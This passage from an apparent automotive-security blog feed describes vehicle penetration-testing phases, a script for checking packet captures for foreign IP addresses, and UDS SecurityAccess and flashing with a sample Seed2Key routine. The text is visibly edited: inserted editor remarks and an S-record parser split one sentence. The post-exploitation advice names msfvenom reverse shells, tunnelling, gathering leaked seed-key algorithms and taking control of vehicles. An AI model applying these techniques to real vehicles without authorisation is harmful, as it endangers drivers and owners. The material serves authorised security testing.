shorten development cycles and cut costs, so a new model usually carries traces of models already on the market. When the client cannot supply material (OEMs and suppliers provide limited information), take the initiative and use OSINT to collect leaked development material (company standards, Service 0x27 SecurityAccess seed-key algorithms, DIDs) and tricks from owner communities (such as sideloading arbitrary apps).</p><p><img src="image-20231006171717100.png" alt="image-20231006171717100"></p><h4 id="3-测试环境适应与调整"><a href="#3-测试环境适应与调整" class="headerlink" title="3. 测试环境适应与调整"></a>3. <strong>Test environment check and adjustment</strong></h4><p>This phase is the first contact with the device under test. Verify that it meets the test conditions, find the problems with the bench and the test vehicle, and get the people responsible to fix them.</p><p>This step looks unimportant but is in practice a major factor in whether the project moves forward. Ideally the client says the environment is ready; in many cases testing reveals it is still a mess. Test vehicles are pre-SOP (Start of Production), so problems are inevitable and must be resolved before formal testing starts. Some important points to help you avoid the pitfalls:</p><ul><li><p>Hardware: high-spec versus low-spec variants</p></li><li><p>System version: flash to a complete, stable build</p></li><li><p>Software version: incomplete functionality</p></li><li><p>Network: Wi-Fi cannot be enabled, cellular will not connect</p></li><li><p>Accounts: the app is not paired with the car</p></li><li><p>Parking: indoors versus outdoors</p></li></ul><p><img src="image-20231006171516174.png" alt="image-20231006171516174" style="zoom:50%;" /></p><h4 id="4-信息收集"><a href="#4-信息收集" class="headerlink" title="4. 信息收集"></a>4. <strong>Information gathering</strong></h4><p>Collect as much information as possible about the target's hardware and software (hardware, network, system, applications, business functions).</p><ul><li><p>Record the target's basic information in a table</p></li><li><p>Disassemble the target to identify its chips, debug interfaces and silkscreen markings</p></li><li><p>Gather network, system and application information, map the relationships between them as a diagram and share it with the team</p></li><li><p>Map business functions such as OTA</p><p><img src="image-20231006171422901.png" alt="image-20231006171422901"></p></li></ul><h4 id="5-威胁建模"><a href="#5-威胁建模" class="headerlink" title="5. 威胁建模"></a>5. <strong>Threat modelling</strong></h4><p>Analyse the target using the information collected in the previous phase and draw up a test plan covering the test content, attack paths, priorities, schedule, division of labour and collaboration.</p><ul><li><p>Asset identification: consolidate and analyse the gathered information to identify the assets to be examined.</p></li><li><p>Threat scenario identification: analyse the assets to identify the threat scenarios they face.</p></li><li><p>Attack path analysis: determine attack paths from what is known about the target device.</p></li><li><p>Test plan: draw it up from the project requirements and the actual state of the target.</p></li></ul><p><img src="image-20231006171328892.png" alt="image-20231006171328892"></p><h4 id="6-漏洞挖掘"><a href="#6-漏洞挖掘" class="headerlink" title="6. 漏洞挖掘"></a>6. Vulnerability discovery</h4><p>Once the most viable attack channels are identified, work out how to gain access to the target system. Analyse the intelligence gathered in the previous phases to find potentially exploitable unknown vulnerabilities and develop exploit code. In parallel, carry out dynamic analysis to hunt for protocol and business-logic vulnerabilities.</p><p><img src="image-20231006110425156.png" alt="image-20231006110425156"></p><h4 id="7-漏洞验证"><a href="#7-漏洞验证" class="headerlink" title="7. 漏洞验证"></a>7. <strong>Vulnerability verification</strong></h4><p>All potential vulnerabilities recorded during static analysis, together with their exploit code, are verified in this phase to confirm whether they can actually be exploited.</p><ul><li>Debug PoCs to verify N-day vulnerabilities</li><li>Verify coding vulnerabilities</li><li>Verify service vulnerabilities</li><li>Verify business-logic vulnerabilities</li><li>Verify other vulnerabilities</li></ul><p><img src="pwn.gif" alt="image-20231006110425156"></p><h4 id="8-后渗透"><a href="#8-后渗透" class="headerlink" title="8. 后渗透"></a>8. <strong>Post-exploitation</strong></h4><p>Once a module has been compromised, determine whether you can pivot into the internal network and maintain access, and move laterally to find further vulnerabilities.</p><ul><li><p>An Android reverse shell can be generated with msfvenom</p></li><li><p>Scan the other ECUs and their open services to find more exposure</p></li><li><p>Use FRP for tunnelling to go deeper into the internal network and set up a convenient channel for testing</p></li><li><p>Look for leftover firmware; firmware is valuable data, so analyse it for vulnerabilities that enable lateral movement</p></li><li><p>Exploit the vulnerabilities to demonstrate impact, such as controlling the vehicle or stealing sensitive data</p></li><li><p>Finally, build the full attack chain and record it on video or screen capture</p></li></ul><h4 id="9-编写报告"><a href="#9-编写报告" class="headerlink" title="9. 编写报告"></a>9. Reporting</h4><p>The report conveys clearly and concisely to the client the vulnerabilities found during the test and their potential impact.</p><ul><li><p>Compliance report: summarise the test items and count the vulnerabilities</p></li><li><p>Vulnerability report: document each vulnerability found</p></li><li>Process record: document the testing process</li></ul><h4 id="10-回归测试"><a href="#10-回归测试" class="headerlink" title="10. 回归测试"></a>10. Regression testing</h4><p>After the client has fixed the vulnerabilities found in the project, verify that the fixes are robust and test whether the patches can be bypassed. Confirm that every vulnerability has been fixed, record the results and report them to the client.</p><h3 id="思考"><a href="#思考" class="headerlink" title="思考"></a>Reflections</h3><p>The more whole-vehicle penetration tests you do, the deeper and broader they become, but practical limits mean progress slows past a certain point. Time is the biggest constraint: limited time and complex systems mean coverage is often low. How to improve efficiency? Growth slows because human effort is finite; as the saying goes, a workman must first sharpen his tools. Vehicle penetration testing currently lacks purpose-built tools and needs a toolset that raises execution efficiency and coverage, such as the call-relationship graph between programs in the figure below, which visualises how the programs relate to each other. Unlike compliance-checking tools, penetration-testing tools act more as a copilot. If you need a particular tool, let's discuss.</p><p><img src="image-20231006114154432.png" alt="image-20231006114154432"></p><ul><li><a href="https://www.synopsys.com/zh-cn/glossary/what-is-penetration-testing.html">Penetration testing and how it works</a></li></ul>]]></content>
<summary type="html"><h2 id="车联网安全进阶之整车渗透测试实践"><a href="#车联网安全进阶之整车渗透测试实践" class="headerlink" title="车联网安全进阶之整车渗透测试实践"></a>Advanced Connected-Vehicle Security: Whole-Vehicle Penetration Testing in Practice</h2><p>Penetration testing is widely known and much discussed, yet doing it well is not easy.</p></summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Advanced Connected-Vehicle Security: Cross-Border Data Transfer Detection</title>
<link href="http://delikely.github.io/2023/05/14/cross-border-check/"/>
<id>http://delikely.github.io/2023/05/14/cross-border-check/</id>
<published>2023-05-14T11:27:28.000Z</published>
<updated>2023-05-15T02:42:37.634Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之跨境传输检测"><a href="#车联网安全进阶之跨境传输检测" class="headerlink" title="车联网安全进阶之跨境传输检测"></a>Advanced Connected-Vehicle Security: Cross-Border Data Transfer Detection</h2><p>Alongside the <strong>Connected-Vehicle Security Basics</strong> series I am starting a new one, <strong>Advanced Connected-Vehicle Security</strong>, to share more advanced material, including but not limited to writing detection scripts; the rest will follow once I have worked it out 🙈.</p><p>The <a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">Technical Requirements for Vehicle Cybersecurity (draft for comment)</a>, published on 5 May, sets a requirement on cross-border data transfer in section 10, <code>Vehicle data and code security requirements</code>: the vehicle must not transmit data directly outside the country.</p><blockquote><p>10.7 The vehicle shall not transmit data directly outside the country.</p><p>Note: a user accessing foreign websites with a browser, sending messages abroad with communication software, or installing third-party apps that may cause data to leave the country is not covered by this clause.</p></blockquote><p>Section <code>A.7.7 Test method for preventing direct data export</code> gives the test method: start a packet capture, exercise each of the test vehicle's pre-installed data-transfer functions, and finally analyse whether the captured packets contain foreign IP addresses.</p><blockquote><p>The tester shall use the following method to check whether the test vehicle meets requirement 10.7:</p><p>a) Enable all of the vehicle's cellular and WLAN networks and exercise each pre-installed data-transfer function in turn;</p><p>b) Capture network traffic for no less than 3600 seconds with a packet-capture tool, parse the packets, analyse whether the destination IP addresses include any foreign IP address, and record the result; no foreign IP address shall be present.</p></blockquote><p>The standard only says <code>no foreign IP address shall be present</code> and gives no method for analysing the capture, so here is the detection method and script I use.</p><h3 id="数据包抓取"><a href="#数据包抓取" class="headerlink" title="数据包抓取"></a>Packet capture</h3><p>Use whichever capture tool fits the scenario; for example, use <code>tcpdump</code> on the T-Box to capture cellular traffic.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">tcpdump -i any -w tbox.pcap</span><br></pre></td></tr></table></figure><h3 id="跨境检测脚本编写"><a href="#跨境检测脚本编写" class="headerlink" title="跨境检测脚本编写"></a>Writing the cross-border check script</h3><p>A Python script extracts the IP addresses from the capture, keeps only the public ones, then looks up each address's location with a public API and picks out the foreign addresses.</p><ol><li><p>Extract the IP addresses from the capture with scapy</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">from scapy.all import rdpcap, IP</span><br><span class="line"></span><br><span class="line">packets = rdpcap(pcap)</span><br><span class="line">ip_list = []</span><br><span class="line">for pkt in packets:</span><br><span class="line">    if IP in pkt:</span><br><span class="line">        # collect both ends: the remote peer is the dst of outbound packets and the src of replies</span><br><span class="line">        for addr in (pkt[IP].src, pkt[IP].dst):</span><br><span class="line">            if addr not in ip_list:</span><br><span class="line">                ip_list.append(addr)</span><br></pre></td></tr></table></figure></li><li><p>Filter for public IP addresses with ipaddress</p><p>Decide whether an address is public by discarding private, loopback, multicast and reserved addresses.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import ipaddress</span><br><span class="line"></span><br><span class="line"># Return True if the address is a public (routable) IP</span><br><span class="line">def is_public_ip(ip):</span><br><span class="line">    ip = ipaddress.ip_address(ip)</span><br><span class="line">    if ip.is_private or ip.is_loopback or ip.is_multicast or ip.is_reserved:</span><br><span class="line">        return False</span><br><span class="line">    else:</span><br><span class="line">        return True</span><br></pre></td></tr></table></figure></li><li><p>Look up each address's location with a public API</p><p>Many public IP geolocation APIs exist; here I use the API of the <code>Baidu Open Data Platform</code>. For a domestic IP it returns a location that starts with the province or municipality name; for a foreign IP it shows only the country.</p><p><img src="image-20230513214955112.png" alt="image-20230513214955112" style="zoom:60%;" /></p><p>Based on that, any location that does not start with a province or municipality name is treated as foreign.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import json</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line"># Check an IP; return its location if it is outside the country, otherwise False</span><br><span class="line">def cross_border_addr(ip):</span><br><span class="line">    # Baidu IP geolocation API</span><br><span class="line">    query_api = "https://opendata.baidu.com/api.php?co=&resource_id=6006&oe=utf8&query="</span><br><span class="line">    homeland = ["中国","北京","天津","河北","山西","内蒙古","辽宁","吉林","黑龙江","上海","江苏","浙江","安徽","福建","江西","山东","河南","湖北","湖南","广东","广西","海南","重庆","四川","贵州","云南","西藏","陕西","甘肃","青海","宁夏","新疆"]</span><br><span class="line">    response = requests.get(query_api + ip)</span><br><span class="line">    location = json.loads(response.content.decode())["data"][0]["location"]</span><br><span class="line">    # Match on prefix rather than the first two characters, so three-character</span><br><span class="line">    # names such as 内蒙古 and 黑龙江 are not misreported as foreign</span><br><span class="line">    if not any(location.startswith(name) for name in homeland):</span><br><span class="line">        return location</span><br><span class="line">    else:</span><br><span class="line">        return False</span><br></pre></td></tr></table></figure></li><li><p>Combine the pieces above and you have a cross-border check script.</p><p>The full script is at <a href="https://github.com/delikely/Automotive-Security-Toolkit">https://github.com/delikely/Automotive-Security-Toolkit</a></p></li></ol><h3 id="检测脚本使用"><a href="#检测脚本使用" class="headerlink" title="检测脚本使用"></a>Using the check script</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">E:\Code\Automotive> python 'cross-border checker.py' -h</span><br><span class="line">usage: PROG [options]</span><br><span class="line"></span><br><span class="line">流量包跨境传输检查</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line">  -h, --help            show this help message and exit</span><br><span class="line">  -f FILE, --file FILE  pcap file</span><br></pre></td></tr></table></figure><p>Use the <code>-f</code> option to specify the capture file to analyse. In the example below, 4 foreign IP addresses were detected in tbox.pcap.</p><p><img src="image-20230513204937877.png" alt="image-20230513204937877" style="zoom:80%;" /></p><h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>Notes</h3><ul><li><p>When the test machine is attached to the vehicle network and its outbound traffic goes through the T-Box, that traffic can contaminate the capture and skew the result.</p></li><li><p>Looking up addresses through a public API reveals every address the vehicle contacted to the API operator; if the captured data is sensitive, query a privately hosted database instead (for example a self-hosted rapiddns deployment).</p></li></ul><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><ul><li><a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">Technical Requirements for Vehicle Cybersecurity (draft for comment)</a></li></ul><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>Series</h3><ol><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">Connected-Vehicle Security Basics: Automotive Modular Platforms</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">Connected-Vehicle Security Basics: Volkswagen Group's Automotive E/E Architecture</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">Connected-Vehicle Security Basics: Main Functions of the T-Box</a></li><li><a href="https://mp.weixin.qq.com/s/RKU0YevKmSOJtb3NMOEy9w">Connected-Vehicle Security Basics: Volkswagen J949 (OCU/T-Box)</a></li><li><a href="https://mp.weixin.qq.com/s/l1-RZ9rI09p__2hwPKSRVw">Connected-Vehicle Security Basics: Charging Infrastructure</a></li><li><a href="https://mp.weixin.qq.com/s/9KVNgiToeDsDIlR1FBMohw">Connected-Vehicle Security Basics: Analysing the In-Vehicle Network Topology from Connector Pinouts</a></li><li><a href="https://mp.weixin.qq.com/s/bVt5-d_XQsEhoODffQheOA">Connected-Vehicle Security Basics: QNX Commands</a></li><li><a href="https://mp.weixin.qq.com/s/pFf7hvan2Z9VOxGyuwIvmg">Connected-Vehicle Security Basics: Buying a Test Bench</a></li><li><a href="https://mp.weixin.qq.com/s/01tV6GfK8L4hNEyn0suwdw">Connected-Vehicle Security Basics: Making a USB SPH2.0 Harness</a></li><li><a href="https://mp.weixin.qq.com/s/X6mVWpj796ZZt9MFzi7U0A">Connected-Vehicle Security Basics: Prerequisites for UDS Flashing</a></li><li><a href="https://mp.weixin.qq.com/s/hOmN2xzSidCAQ_KrTJ-3VA">Connected-Vehicle Security Basics: UDS Flashing Security</a></li></ol>]]></content>
<summary type="html"><h2 id="车联网安全进阶之跨境传输检测"><a href="#车联网安全进阶之跨境传输检测" class="headerlink" title="车联网安全进阶之跨境传输检测"></a>Advanced Automotive Security: Cross-Border Transmission Detection</h2><p>In the <strong>Automotive Security Basics</st</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Automotive Security Basics: UDS Flashing</title>
<link href="http://delikely.github.io/2023/05/01/UDS-flash/"/>
<id>http://delikely.github.io/2023/05/01/UDS-flash/</id>
<published>2023-05-01T11:04:33.000Z</published>
<updated>2023-10-27T02:37:06.101Z</updated>
<content type="html"><![CDATA[<h1 id="车联网安全基础知识之UDS刷写"><a href="#车联网安全基础知识之UDS刷写" class="headerlink" title="车联网安全基础知识之UDS刷写"></a>Automotive Security Basics: UDS Flashing</h1><p>It has been a while since the last post. The <strong>Automotive Security Basics</strong> series I planned has accumulated <em>many, many</em> draft files. From the start of the year until recently I was busy with projects and some personal matters, so nothing got published. Several readers have been asking for updates; everyone else is welcome to nudge me and request topics too. While doing security testing of an SOA architecture for my company recently, I found new uses for the 0x27 algorithm in some new scenarios, along with its security problems. Going back through the literature, there are plenty of articles about service 0x27 (SecurityAccess), but very few that walk through the complete UDS flashing process, and fewer still that connect it with security. This post covers the security of 0x27 SecurityAccess and my understanding of the UDS flashing flow.</p><h2 id="前置基础知识"><a href="#前置基础知识" class="headerlink" title="前置基础知识"></a>Prerequisites</h2><p>This post does not explain UDS from the ground up; dedicated posts on UDSonCAN and UDSonIP will follow and look at the protocol from a security-research angle. The focus here is the flashing flow. Once you understand it, you can script checks of MCU firmware flashing security and make security testing more efficient.</p><h3 id="服务ID汇总"><a href="#服务ID汇总" class="headerlink" title="服务ID汇总"></a>Service ID summary</h3><p>First, an overview of the services involved in flashing and their role in the process.</p><table><thead><tr><th>Service ID</th><th>Diagnostic service</th><th>Role in flashing</th><th>Notes</th></tr></thead><tbody><tr><td>0x10</td><td>DiagnosticSessionControl</td><td>Switch to the extended session to check flashing conditions and stop some functions<br />Switch to the programming session to perform the flash</td><td></td></tr><tr><td>0x11</td><td>ECUReset</td><td>Restart the ECU after flashing so the new firmware takes effect</td><td></td></tr><tr><td>0x27</td><td>SecurityAccess</td><td>Verify the identity of the flashing tool, using seed-key</td><td></td></tr><tr><td>0x28</td><td>CommunicationControl</td><td>Disable and re-enable normal communication messages</td><td></td></tr><tr><td>0x29</td><td>Authentication</td><td>PKI-based authentication</td><td>Enhanced successor of 0x27</td></tr><tr><td>0x31</td><td>RoutineControl</td><td>Run specific routines: precondition check, memory erase, programming-dependency check, etc.</td><td></td></tr><tr><td>0x34</td><td>RequestDownload</td><td>Set the download parameters (start address, length)</td><td></td></tr><tr><td>0x36</td><td>TransferData</td><td>Transfer the firmware</td><td></td></tr><tr><td>0x37</td><td>RequestTransferExit</td><td>End the data transfer</td><td></td></tr><tr><td>0x3E</td><td>TesterPresent</td><td>Keep the ECU in the current session</td><td></td></tr><tr><td>0x85</td><td>ControlDTCSetting</td><td>Enable or disable DTC storage</td><td></td></tr></tbody></table><h3 id="会话"><a href="#会话" class="headerlink" title="会话"></a>Sessions</h3><p>A diagnostic session groups a set of diagnostic services and functions. Only the services supported by the currently active session are answered. An ECU usually has at least two sessions: one default session and one or more non-default sessions. The non-default sessions include the programming session, the extended session and others defined by the manufacturer. A common set of sessions:</p><table><thead><tr><th>Diagnostic session</th><th>Session ID</th><th>Description</th></tr></thead><tbody><tr><td>Default session</td><td>0x01</td><td>Entered automatically after ECU start-up. Only basic diagnostic services are available.</td></tr><tr><td>Programming session</td><td>0x02</td><td>Entered when the application software or calibration data is updated. Supports the update-related services such as 0x34, 0x36 and 0x37.</td></tr><tr><td>Extended session</td><td>0x03</td><td>Supports the services of the default session plus additional diagnostic services.</td></tr><tr><td>…</td><td>…</td><td>…</td></tr></tbody></table><p>DiagnosticSessionControl (0x10) activates the controller's different session modes. During a firmware flash, 0x10 is used to move back and forth between the default, programming and extended sessions.</p><h3 id="会话保持-3E-00"><a href="#会话保持-3E-00" class="headerlink" title="会话保持(3E 00)"></a>Keep-alive (3E 00)</h3><p>TesterPresent tells one or more servers that the client is still connected to the vehicle and that previously activated diagnostic services and/or communication should stay active. It keeps one or more servers in a session other than the default session, and works by sending 3E periodically.</p><p>Throughout the flash, the tool sends TesterPresent periodically; if the suppress-positive-response bit is set (3E 80 instead of 3E 00) the ECU does not have to answer. Without the keep-alive, the ECU falls back to the default session after a few seconds (the S3 server timeout, commonly 5 s).</p><ul><li>Before flashing, the ECU must be kept in the extended session.</li><li>During flashing, it must be kept in the programming session.</li></ul><h3 id="27-服务-安全访问认证流程"><a href="#27-服务-安全访问认证流程" class="headerlink" title="27 服务-安全访问认证流程"></a>Service 0x27: the SecurityAccess flow</h3><p>SecurityAccess protects data by granting access to services and data related to confidentiality, emissions and safety. Services such as 2E (WriteDataByIdentifier), 2F (InputOutputControlByIdentifier), 31 (RoutineControl), 34 (RequestDownload), 35 (RequestUpload), 36 (TransferData) and 37 (RequestTransferExit) typically require it. Authentication relies on the relationship between a seed and a key. An example exchange:</p><p><img src="网络拓扑-UDS.drawio.png" alt="网络拓扑-UDS.drawio" style="zoom:50%;" /></p><ol><li>Request Seed: the tester sends service 0x27 with the security level to unlock (subfunction 0X) to the target ECU.</li><li>Request Seed Reply: the ECU generates a random seed (4 bytes in this example; the length is OEM-defined) and returns it to the tester.</li><li>Send Key: from the seed, the tester computes the key with the proprietary Seed2Key algorithm and sends it to the ECU. The subfunction 0Y used for sendKey is the requestSeed subfunction plus 1: when the seed is requested with 27 01, the key is sent with 27 02.</li><li>Send Key Reply: the ECU runs Seed2Key on the seed it issued, compares the result with the key it received and returns the outcome.</li></ol><h3 id="Seed2Key-算法"><a href="#Seed2Key-算法" class="headerlink" title="Seed2Key 算法"></a>The Seed2Key algorithm</h3><p>The heart of SecurityAccess is the Seed2Key algorithm. It is usually a fairly simple shift-and-arithmetic construction, like the following (the tab characters of the original listing were rendered as the word <code>true</code>; they are restored here, and the function now actually uses its <code>constData</code> parameter rather than the <code>#define</code>, as the description below requires):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SECURITYCONSTANT 0x464c4147  <span class="comment">/* default security constant, passed in as constData */</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">WORD <span class="title">seedToKey</span> <span class="params">(WORD wSeed, DWORD constData)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">    DWORD wLastSeed;</span><br><span class="line">    WORD wLastKey;</span><br><span class="line">    wLastSeed = wSeed;</span><br><span class="line">    wLastSeed = (wLastSeed >> <span class="number">5</span>) | (wLastSeed << <span class="number">23</span>);  <span class="comment">/* shift-and-or mix (not a full 32-bit rotate) */</span></span><br><span class="line">    wLastSeed *= <span class="number">7</span>;</span><br><span class="line">    wLastSeed ^= constData;                               <span class="comment">/* the "password": shared by ECU and tester */</span></span><br><span class="line">    wLastKey = (WORD)wLastSeed;                           <span class="comment">/* only the low 16 bits become the key */</span></span><br><span class="line">    <span class="keyword">return</span> wLastKey;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>seed2key takes two inputs: the <strong>seed</strong> and the <strong>security constant</strong>. The seed is generated randomly by the ECU; the constant is built into both the ECU and the tester, so in a sense the constant is the password. ECUs with different roles that share the same algorithm normally use different constants.</p><h3 id="诊断连接方式"><a href="#诊断连接方式" class="headerlink" title="诊断连接方式"></a>Diagnostic connection topologies</h3><p>A diagnostic device connects to an ECU in one of two ways, shown below.</p><ol><li>The diagnostic device connects to the gateway, which forwards the messages to the ECU;</li><li>The diagnostic device connects directly to the ECU.</li></ol><p><img src="image-20230424231646155.png" alt="image-20230424231646155" style="zoom: 35%;" /></p><h3 id="固件格式"><a href="#固件格式" class="headerlink" title="固件格式"></a>Firmware formats</h3><p>S-record, Intel HEX, BIN and VBF are the formats commonly used for MCU firmware in vehicles; a brief introduction to each follows. Knowing the formats helps with firmware analysis and with flashing security tests.</p><h4 id="S-record"><a href="#S-record" class="headerlink" title="S-record"></a>S-record</h4><p>S-record 
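is a line-oriented text encoding of a memory image, and it is the input a flashing tool has to turn into 0x34/0x36/0x37 requests. The Python below is an added example; it is not code from the original post or from the author's toolkit. It parses S-record text (checking each record's byte count and checksum, and the S5 record count), merges the data records into contiguous segments, and then builds the UDS request payloads that the flashing flow described later in this post would send per segment: one RequestDownload per contiguous block, TransferData blocks numbered by blockSequenceCounter, and RequestTransferExit to close each block. The record lines in <code>SAMPLE_SREC</code> are constructed for this example and are not from a real firmware; the <code>max_block_len</code>, dataFormatIdentifier and addressAndLengthFormatIdentifier values are assumptions; and because the checksum an ECU returns in its 0x37 response is OEM-specific, a plain CRC32 stands in for it.</p>

```python
"""Parse a Motorola S-record image and plan its UDS download.

Added example, not part of the original post. SAMPLE_SREC is constructed:
an S0 header "TEST", two contiguous S3 records at 0x01000000, one isolated
S3 record at 0x01180000, an S5 record-count line and an S7 termination
record carrying the execution start address (0x00FC0000).
"""
import struct
import zlib

SAMPLE_SREC = """\
S007000054455354B8
S3090100000001020304EB
S3090100000405060708D7
S30701180000AABB7A
S5030003F9
S70500FC0000FE
"""

# Width of the address field in bytes, by record type digit
ADDR_LEN = {"0": 2, "1": 2, "2": 3, "3": 4, "5": 2, "6": 3, "7": 4, "8": 3, "9": 2}


def parse_srec(text):
    """Return {'header', 'start', 'segments'} for S-record text.

    Checksum = one's complement of the low byte of the sum of the byte-count,
    address and data bytes. S5/S6 counts are checked against the number of
    data records seen so far. Data records are merged into sorted, contiguous
    (address, bytes) segments, which is what RequestDownload needs.
    """
    header, start, records = None, None, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if len(line) < 10 or line[0] != "S" or line[1] not in ADDR_LEN:
            raise ValueError(f"line {lineno}: unsupported record {line[:2]!r}")
        body = bytes.fromhex(line[2:])
        if body[0] != len(body) - 1:
            raise ValueError(f"line {lineno}: byte count mismatch")
        if (sum(body[:-1]) & 0xFF) ^ 0xFF != body[-1]:
            raise ValueError(f"line {lineno}: bad checksum")
        rtype, n = line[1], ADDR_LEN[line[1]]
        addr = int.from_bytes(body[1:1 + n], "big")
        data = body[1 + n:-1]
        if rtype == "0":
            header = data.decode("ascii", "replace")
        elif rtype in "123":
            records.append((addr, data))
        elif rtype in "56" and addr != len(records):
            raise ValueError(f"line {lineno}: record count {addr} != {len(records)}")
        elif rtype in "789":
            start = addr
    segments = []
    for addr, data in sorted(records):
        if segments and segments[-1][0] + len(segments[-1][1]) == addr:
            segments[-1] = (segments[-1][0], segments[-1][1] + data)
        else:
            segments.append((addr, data))
    return {"header": header, "start": start, "segments": segments}


def flash_requests(segments, max_block_len, dfi=0x00, alfid=0x44):
    """Build the raw UDS request payloads a tester sends for each segment.

    34 dfi alfid <addr:4> <size:4>   RequestDownload (ALFID 0x44: 4-byte size, 4-byte address)
    36 bsc <data>                     TransferData; blockSequenceCounter starts at 0x01, wraps 0xFF->0x00
    37                                RequestTransferExit
    dfi 0x00 means uncompressed, unencrypted data. max_block_len is the
    maxNumberOfBlockLength the ECU returned for 0x34; it includes the SID and
    counter bytes, so each block carries max_block_len - 2 bytes of data.
    """
    chunk = max_block_len - 2
    plan = []
    for addr, data in segments:
        reqs = [bytes([0x34, dfi, alfid]) + struct.pack(">II", addr, len(data))]
        bsc = 0x01
        for off in range(0, len(data), chunk):
            reqs.append(bytes([0x36, bsc]) + data[off:off + chunk])
            bsc = (bsc + 1) & 0xFF
        reqs.append(bytes([0x37]))
        # Value to compare against the checksum in the ECU's 0x37 positive
        # response; the real algorithm is OEM-defined, CRC32 is only a stand-in.
        plan.append({"addr": addr, "requests": reqs, "crc32": zlib.crc32(data)})
    return plan


if __name__ == "__main__":
    image = parse_srec(SAMPLE_SREC)
    print("Header:", image["header"], " Start: %08X" % image["start"])
    for addr, data in image["segments"]:
        print("Data: %08X - %08X" % (addr, addr + len(data) - 1))
    for block in flash_requests(image["segments"], max_block_len=6):
        for req in block["requests"]:
            print("  ->", req.hex(" "))
```

<p>Run stand-alone, the script prints the same summary <code>srec_info</code> gives (header, start address, data ranges) followed by the request bytes; a flipped checksum digit in any record raises a <code>ValueError</code>, which is exactly the check a flashing tool should make before it erases anything. Two things to notice in the output: the isolated record at 0x01180000 gets its own 0x34, because RequestDownload covers only one contiguous region, and with dfi = 0x00 the TransferData payloads are the firmware in the clear, which is why a sniffer on the bus can recover it (see the eavesdropping threat later in this post).</p><p>S-record 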
is a file format designed by Motorola for writing MCU memory, EPROM and EEPROM; it represents binary data as ASCII characters. Common extensions are .srecord, .srec, .s19 and .mot. The layout is shown below.</p><p><img src="Motorola_SREC_Chart.png" alt="img"></p><ul><li><strong>Header Record</strong>: file header, carrying the module name, version number and similar information;</li><li><strong>Data Record</strong>: data records, of which there are three types, S1, S2 and S3 (16-, 24- and 32-bit addresses);</li><li><strong>Count Record (optional)</strong>: the number of S1/S2/S3 records transmitted before it;</li><li><strong>Termination Record</strong>: the end record, of which there are three types, S7, S8 and S9.</li></ul><p><img src="image-20230426114205612.png" alt="image-20230426114205612"></p><p>S0 Record (header): record type "S0". The address field is unused and zero-filled (0x0000). Decoding the data field from hex to text gives <code>JKE_X1_APP_SOC.s19</code>. This line marks the start of the program, is not burned into memory, and describes the file (it may contain the file name, version number, etc.).</p><p>S3 Record (data): record type "S3". The address field is a 4-byte address; the data field holds the loadable data.</p><p>S7 Record (termination): record type "S7". The address field is a 4-byte address containing the execution start address. There is no data field. This line marks the end of the program and is not burned into memory.</p><p><em>Note:</em> the S-record carries the firmware's load addresses, so when reverse engineering take them straight from the file and use them as the base address.</p><h4 id="Intel-HEX"><a href="#Intel-HEX" class="headerlink" title="Intel HEX"></a>Intel HEX</h4><p>The HEX files produced by compiling and linking in embedded MCU development use the Intel HEX format, another text format that stores binary data as ASCII.</p><p><img src="image-20230426121555714.png" alt="image-20230426121555714"></p><h4 id="BIN"><a href="#BIN" class="headerlink" title="BIN"></a>BIN</h4><p>A raw binary file: only the firmware data, with no start address or descriptive information.</p><p><img src="image-20230426132304089.png" alt="image-20230426132304089"></p><h4 id="自定义格式"><a href="#自定义格式" class="headerlink" title="自定义格式"></a>Proprietary formats</h4><p>OEM-specific formats such as VBF (Volvo Binary File), used in vehicles from Volvo, Mazda, Ford, Geely and others.</p><p>The file header records the VBF version, software version information, the ECU's physical address, the data start address, etc.</p><p><img src="image-20230426132731243.png" alt="image-20230426132731243"></p><h4 id="分析工具"><a href="#分析工具" class="headerlink" title="分析工具"></a>Analysis tools</h4><h5 id="srecord"><a href="#srecord" class="headerlink" title="srecord"></a>srecord</h5><p>The srecord command-line tools</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install srecord</span><br></pre></td></tr></table></figure><p>Show information about an S-record file</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 